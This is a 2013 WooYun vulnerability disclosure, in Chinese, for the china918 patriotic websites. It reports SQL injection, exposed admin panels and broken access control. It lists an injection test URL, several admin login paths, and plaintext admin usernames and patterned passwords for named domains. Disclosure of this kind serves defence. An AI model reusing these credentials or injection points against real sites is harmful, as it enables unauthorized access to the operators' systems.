漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-037430
漏洞标题:中国918爱国网多处漏洞(sql注入,越权访问等)
相关厂商:中国918爱国网
漏洞作者: u6q2q8PAxa4
提交时间:2013-09-18 12:42
修复时间:2013-11-02 12:42
公开时间:2013-11-02 12:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-02: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
sql注入 后台泄漏 密码有规律 越权访问是进一个后台可以访问别的目录后台不要登录就有权限
详细说明:
http://www.china918.net/91805/newxp/Special_News.asp?SpecialID=26 and 1=1
http://www.china918.net/zlg/admin/login.asp 918网老吴 ch!@91809
http://www.china918.net/91801/newxp/admin/login.asp 918网老吴 ch!@91801
http://www.china918.net/91805/newxp/admin/login.asp 918网老吴 ch!@91805
http://www.china918.net/91806/newxp/admin/login.asp 918网老吴 ch!@91806
http://www.china918.net/91807/newxp/admin/login.asp 918网老吴 ch!@91807
http://www.china918.net/91808/newxp/admin/login.asp 918网老吴 ch!@91808
一样的程序都是注入
http://www.china918.org 和net一样
http://www.china918.cn admin 1478951 织梦的搜索注入
漏洞证明:
修复方案:
版权声明:转载请注明来源 u6q2q8PAxa4@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝